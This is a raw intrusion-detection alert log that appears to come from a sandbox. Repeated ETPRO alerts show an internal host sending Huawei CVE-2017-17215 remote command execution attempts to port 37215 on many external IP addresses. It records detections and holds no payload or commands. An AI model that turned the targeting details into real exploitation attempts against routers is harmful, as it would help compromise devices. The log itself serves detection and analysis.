                                                        06/13/24-21:32:19.729243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374837215192.168.2.14197.98.136.236
                                                        06/13/24-21:33:00.885571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4563237215192.168.2.14197.122.197.104
                                                        06/13/24-21:32:48.568447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5666637215192.168.2.14156.138.3.201
                                                        06/13/24-21:32:36.265403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3648837215192.168.2.1441.248.72.248
                                                        06/13/24-21:32:03.273949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5514637215192.168.2.14156.69.91.78
                                                        06/13/24-21:33:05.013464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865237215192.168.2.14156.184.26.148
                                                        06/13/24-21:33:17.304327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4675237215192.168.2.14156.7.82.122
                                                        06/13/24-21:33:09.085159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219437215192.168.2.14197.214.1.6
                                                        06/13/24-21:31:57.138063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4986637215192.168.2.14197.52.51.182
                                                        06/13/24-21:32:30.124799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4740237215192.168.2.14156.218.182.119
                                                        06/13/24-21:32:07.403139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3650037215192.168.2.14197.105.28.17
                                                        06/13/24-21:32:23.935990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3832237215192.168.2.14156.18.228.82
                                                        06/13/24-21:33:05.017326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5365637215192.168.2.1441.124.83.66
                                                        06/13/24-21:32:30.075731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4942237215192.168.2.14156.111.225.23
                                                        06/13/24-21:32:42.418804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5234637215192.168.2.1441.206.235.148
                                                        06/13/24-21:32:13.568143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4487037215192.168.2.14197.163.54.14
                                                        06/13/24-21:32:36.268283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3504437215192.168.2.14156.158.94.207
                                                        06/13/24-21:32:15.608639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345637215192.168.2.14197.151.15.122
                                                        06/13/24-21:32:23.943286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5293637215192.168.2.14156.134.138.178
                                                        06/13/24-21:31:59.177336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5651437215192.168.2.1441.73.140.186
                                                        06/13/24-21:32:46.503880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5442837215192.168.2.1441.93.75.168
                                                        06/13/24-21:32:03.308617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922237215192.168.2.14197.99.59.44
                                                        06/13/24-21:32:21.786996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5836437215192.168.2.1441.9.210.6
                                                        06/13/24-21:32:01.219728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5717237215192.168.2.1441.65.222.54
                                                        06/13/24-21:32:21.799806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810837215192.168.2.14156.15.215.158
                                                        06/13/24-21:32:52.658232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4612237215192.168.2.14197.82.101.108
                                                        06/13/24-21:32:58.823698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5001837215192.168.2.1441.197.178.12
                                                        06/13/24-21:32:28.028521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3325237215192.168.2.1441.107.113.203
                                                        06/13/24-21:32:34.194483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4379837215192.168.2.14156.233.57.146
                                                        06/13/24-21:32:13.546254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4065637215192.168.2.14156.181.165.202
                                                        06/13/24-21:32:01.238141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637037215192.168.2.1441.244.214.253
                                                        06/13/24-21:32:15.636091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3968237215192.168.2.1441.142.241.95
                                                        06/13/24-21:32:44.453787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641637215192.168.2.14156.149.27.182
                                                        06/13/24-21:32:17.696398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5107237215192.168.2.1441.104.146.206
                                                        06/13/24-21:32:25.993068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3328637215192.168.2.14156.168.196.198
                                                        06/13/24-21:32:21.801015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4591237215192.168.2.14156.76.130.170
                                                        06/13/24-21:32:13.568572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849037215192.168.2.1441.227.59.111
                                                        06/13/24-21:32:44.457107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219837215192.168.2.14156.103.10.165
                                                        06/13/24-21:32:46.526099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599037215192.168.2.14197.111.63.224
                                                        06/13/24-21:32:54.708386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5943037215192.168.2.1441.211.199.90
                                                        06/13/24-21:32:25.991574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3902637215192.168.2.14197.163.159.36
                                                        06/13/24-21:32:42.424341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5966837215192.168.2.14156.236.35.68
                                                        06/13/24-21:32:13.567591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104437215192.168.2.1441.49.50.27
                                                        06/13/24-21:32:21.781863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4390437215192.168.2.14156.1.181.37
                                                        06/13/24-21:32:03.278363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578037215192.168.2.14156.52.1.101
                                                        06/13/24-21:32:01.221123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3672637215192.168.2.14197.194.117.63
                                                        06/13/24-21:32:56.757221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3536037215192.168.2.14156.221.162.92
                                                        06/13/24-21:33:05.014367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104237215192.168.2.1441.157.170.26
                                                        06/13/24-21:33:00.868175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4682637215192.168.2.1441.111.245.234
                                                        06/13/24-21:32:34.216364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4707637215192.168.2.14197.176.14.114
                                                        06/13/24-21:32:40.373769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4607437215192.168.2.1441.69.39.206
                                                        06/13/24-21:32:52.677044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4876637215192.168.2.14156.76.156.33
                                                        06/13/24-21:32:07.416784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542637215192.168.2.1441.29.149.162
                                                        06/13/24-21:32:32.153259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4210837215192.168.2.14156.117.115.152
                                                        06/13/24-21:33:15.273876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5247837215192.168.2.14197.31.220.135
                                                        06/13/24-21:33:11.155721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727237215192.168.2.1441.234.140.3
                                                        06/13/24-21:32:07.417334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5047037215192.168.2.1441.33.127.167
                                                        06/13/24-21:32:58.844006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4471437215192.168.2.14197.215.138.125
                                                        06/13/24-21:32:07.403598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025237215192.168.2.1441.217.8.177
                                                        06/13/24-21:31:57.089979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967637215192.168.2.1441.79.20.241
                                                        06/13/24-21:32:05.370960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5690037215192.168.2.1441.204.151.115
                                                        06/13/24-21:32:28.043908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5192237215192.168.2.14197.62.80.135
                                                        06/13/24-21:32:36.265163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4409837215192.168.2.14197.126.195.126
                                                        06/13/24-21:32:58.842681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4780837215192.168.2.1441.88.233.72
                                                        06/13/24-21:32:23.941572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038837215192.168.2.1441.157.196.16
                                                        06/13/24-21:33:15.254681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5822837215192.168.2.14156.185.22.132
                                                        06/13/24-21:32:15.611414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4858637215192.168.2.14156.170.91.101
                                                        06/13/24-21:32:46.503906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5978037215192.168.2.14156.251.77.108
                                                        06/13/24-21:33:13.211751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4372437215192.168.2.14197.241.1.184
                                                        06/13/24-21:33:17.309086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4763437215192.168.2.14197.172.66.1
                                                        06/13/24-21:32:50.612551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4150037215192.168.2.1441.78.63.1
                                                        06/13/24-21:33:13.212470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4927237215192.168.2.1441.31.48.179
                                                        06/13/24-21:32:07.401789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4907037215192.168.2.14197.242.185.170
                                                        06/13/24-21:32:58.820067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5770637215192.168.2.14156.6.127.86
                                                        06/13/24-21:32:13.543901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4129837215192.168.2.1441.169.157.42
                                                        06/13/24-21:33:09.112602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3707037215192.168.2.14156.93.73.208
                                                        06/13/24-21:32:17.696463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5292837215192.168.2.1441.54.14.237
                                                        06/13/24-21:32:01.223098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5429237215192.168.2.14156.66.66.19
                                                        06/13/24-21:32:21.787667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5193037215192.168.2.14156.62.216.71
                                                        06/13/24-21:32:07.415327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552237215192.168.2.14156.254.85.134
                                                        06/13/24-21:32:28.043762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4930837215192.168.2.1441.114.51.213
                                                        06/13/24-21:32:09.437428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4770437215192.168.2.14197.67.175.2
                                                        06/13/24-21:33:17.306101TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3280437215192.168.2.14197.232.217.21
                                                        06/13/24-21:32:03.279635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3792837215192.168.2.14197.183.92.21
                                                        06/13/24-21:33:11.160048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4784437215192.168.2.1441.164.115.54
                                                        06/13/24-21:32:54.707992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5794437215192.168.2.14156.65.128.190
                                                        06/13/24-21:32:05.345723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942237215192.168.2.1441.121.195.244
                                                        06/13/24-21:32:11.507656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5089837215192.168.2.14156.201.113.60
                                                        06/13/24-21:32:30.123734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5203437215192.168.2.14197.137.52.62
                                                        06/13/24-21:31:57.132921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3699237215192.168.2.14197.130.71.247
                                                        06/13/24-21:32:56.758392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3493237215192.168.2.1441.38.118.49
                                                        06/13/24-21:32:28.027233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5659037215192.168.2.1441.29.89.95
                                                        06/13/24-21:32:58.823444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4221037215192.168.2.1441.8.129.182
                                                        06/13/24-21:33:11.161120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5749037215192.168.2.14156.24.150.71
                                                        06/13/24-21:32:21.805739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564437215192.168.2.14156.194.137.223
                                                        06/13/24-21:32:38.303062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3668637215192.168.2.14197.118.104.35
                                                        06/13/24-21:32:09.440831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3939837215192.168.2.14156.78.161.22
                                                        06/13/24-21:32:25.993009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3490637215192.168.2.1441.221.42.78
                                                        06/13/24-21:31:57.129956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4424437215192.168.2.1441.42.121.144
                                                        06/13/24-21:32:40.353700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5526837215192.168.2.14197.104.176.150
                                                        06/13/24-21:33:02.914394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3806437215192.168.2.1441.8.50.234
                                                        06/13/24-21:32:17.678214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4227037215192.168.2.14197.97.214.253
                                                        06/13/24-21:32:23.930321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330837215192.168.2.1441.8.180.28
                                                        06/13/24-21:32:50.614703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4170037215192.168.2.14197.126.84.67
                                                        06/13/24-21:32:09.453468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4473837215192.168.2.1441.67.143.235
                                                        06/13/24-21:33:17.304236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3444037215192.168.2.1441.144.214.251
                                                        06/13/24-21:33:17.308913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4208037215192.168.2.1441.168.203.24
                                                        06/13/24-21:31:57.153760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077237215192.168.2.14197.32.105.53
                                                        06/13/24-21:32:03.276503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803037215192.168.2.14156.53.92.173
                                                        06/13/24-21:33:00.886714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4985837215192.168.2.1441.12.80.217
                                                        06/13/24-21:31:57.133506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3855437215192.168.2.1441.103.81.12
                                                        06/13/24-21:32:30.077923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5648037215192.168.2.1441.151.208.126
                                                        06/13/24-21:32:05.344723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5113237215192.168.2.14156.51.153.63
                                                        06/13/24-21:32:42.408826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3466837215192.168.2.14156.241.45.187
                                                        06/13/24-21:32:58.823627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3540437215192.168.2.1441.63.163.106
                                                        06/13/24-21:33:05.012104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4997837215192.168.2.14156.6.168.71
                                                        06/13/24-21:31:59.176943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349437215192.168.2.14156.66.100.2
                                                        06/13/24-21:32:21.800504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5919037215192.168.2.1441.145.104.233
                                                        06/13/24-21:32:56.754902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5474637215192.168.2.1441.213.189.60
                                                        06/13/24-21:33:17.339438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5728837215192.168.2.14197.237.237.87
                                                        06/13/24-21:32:38.322671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027237215192.168.2.14197.13.105.93
                                                        06/13/24-21:32:21.780064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5440037215192.168.2.14197.59.253.57
                                                        06/13/24-21:32:56.791341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3383237215192.168.2.14197.37.1.84
                                                        06/13/24-21:32:34.195573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4540237215192.168.2.1441.73.119.55
                                                        06/13/24-21:32:05.345365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3608037215192.168.2.14156.2.196.254
                                                        06/13/24-21:32:52.660605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4204037215192.168.2.14197.54.6.250
                                                        06/13/24-21:32:01.248309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5950437215192.168.2.14156.85.226.254
                                                        06/13/24-21:33:09.107025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4078637215192.168.2.1441.138.42.17
                                                        06/13/24-21:32:19.731572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5506437215192.168.2.1441.161.33.236
                                                        06/13/24-21:32:30.078656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4555637215192.168.2.14156.82.146.152
                                                        06/13/24-21:33:05.012259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4695037215192.168.2.14197.17.211.61
                                                        06/13/24-21:32:17.675626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3910837215192.168.2.1441.61.254.21
                                                        06/13/24-21:32:40.358139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4866837215192.168.2.14197.157.9.137
                                                        06/13/24-21:32:13.544018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4177837215192.168.2.14156.176.250.180
                                                        06/13/24-21:32:23.832462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5320837215192.168.2.14197.171.197.106
                                                        06/13/24-21:32:25.994014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4862437215192.168.2.14197.44.62.194
                                                        06/13/24-21:33:02.912424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3558037215192.168.2.1441.113.74.5
                                                        06/13/24-21:33:11.174612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3831237215192.168.2.14197.43.216.11
                                                        06/13/24-21:32:38.296425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5583237215192.168.2.1441.157.104.35
                                                        06/13/24-21:32:15.638233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5105837215192.168.2.14197.142.187.146
                                                        06/13/24-21:32:11.507487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484637215192.168.2.14197.130.16.171
                                                        06/13/24-21:32:15.611256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3751637215192.168.2.14197.6.115.61
                                                        06/13/24-21:33:11.177385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5638837215192.168.2.1441.208.251.106
                                                        06/13/24-21:31:59.196425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066037215192.168.2.14156.218.4.34
                                                        06/13/24-21:31:57.131350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5668837215192.168.2.1441.128.149.86
                                                        06/13/24-21:32:17.670664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4156037215192.168.2.14156.69.129.50
                                                        06/13/24-21:32:23.937931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4300637215192.168.2.14156.198.105.51
                                                        06/13/24-21:32:30.128063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374437215192.168.2.1441.172.175.236
                                                        06/13/24-21:32:52.654550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4350037215192.168.2.14197.206.235.253
                                                        06/13/24-21:32:58.839225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3419637215192.168.2.1441.125.200.141
                                                        06/13/24-21:32:23.834173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3303037215192.168.2.14156.159.72.237
                                                        06/13/24-21:32:56.758132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521837215192.168.2.14197.116.126.184
                                                        06/13/24-21:31:59.196534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5479437215192.168.2.1441.236.174.219
                                                        06/13/24-21:33:11.153997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5924237215192.168.2.14156.48.185.76
                                                        06/13/24-21:32:23.941078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4109437215192.168.2.1441.194.87.17
                                                        06/13/24-21:32:23.943373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4800037215192.168.2.1441.134.184.131
                                                        06/13/24-21:33:05.016138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4160037215192.168.2.14156.150.99.214
                                                        06/13/24-21:31:59.176679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5874637215192.168.2.14197.66.183.65
                                                        06/13/24-21:33:00.887820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4415637215192.168.2.14197.151.174.238
                                                        06/13/24-21:33:11.157349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5963637215192.168.2.14197.6.230.206
                                                        06/13/24-21:32:30.078446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256637215192.168.2.14197.91.9.239
                                                        06/13/24-21:33:17.309005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4554437215192.168.2.1441.247.195.40
                                                        06/13/24-21:32:01.219503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4007037215192.168.2.1441.116.218.225
                                                        06/13/24-21:32:21.801115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3308637215192.168.2.1441.108.118.123
                                                        06/13/24-21:33:13.230515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4211437215192.168.2.14156.13.255.146
                                                        06/13/24-21:31:57.131294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628837215192.168.2.14156.117.58.200
                                                        06/13/24-21:32:03.277587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3397637215192.168.2.14197.163.2.0
                                                        06/13/24-21:32:40.380426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5446837215192.168.2.14197.132.139.124
                                                        06/13/24-21:32:19.752788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3976237215192.168.2.14197.222.92.188
                                                        06/13/24-21:32:50.612092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3809837215192.168.2.1441.201.20.100
                                                        06/13/24-21:33:00.869360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3528637215192.168.2.1441.43.90.100
                                                        06/13/24-21:32:11.488607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3911037215192.168.2.14197.214.37.105
                                                        06/13/24-21:33:17.307799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335237215192.168.2.14156.144.89.31
                                                        06/13/24-21:32:17.675802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5820437215192.168.2.14197.131.117.33
                                                        06/13/24-21:32:56.753380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3521437215192.168.2.1441.244.139.212
                                                        06/13/24-21:32:28.027769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4315837215192.168.2.14156.228.6.135
                                                        06/13/24-21:32:44.477845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5158037215192.168.2.1441.174.91.45
                                                        06/13/24-21:33:02.910923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4680637215192.168.2.1441.199.95.110
                                                        06/13/24-21:33:00.888594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5237837215192.168.2.14197.216.193.82
                                                        06/13/24-21:32:21.785769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4536037215192.168.2.14156.206.219.142
                                                        06/13/24-21:31:59.198038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4278037215192.168.2.1441.124.145.165
                                                        06/13/24-21:31:57.093081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4114237215192.168.2.14197.95.142.7
                                                        06/13/24-21:32:07.403630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4225637215192.168.2.1441.230.61.20
                                                        06/13/24-21:32:48.553019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5551437215192.168.2.1441.128.6.170
                                                        06/13/24-21:32:28.048209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5216637215192.168.2.14156.188.119.127
                                                        06/13/24-21:32:09.439184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133237215192.168.2.1441.151.196.88
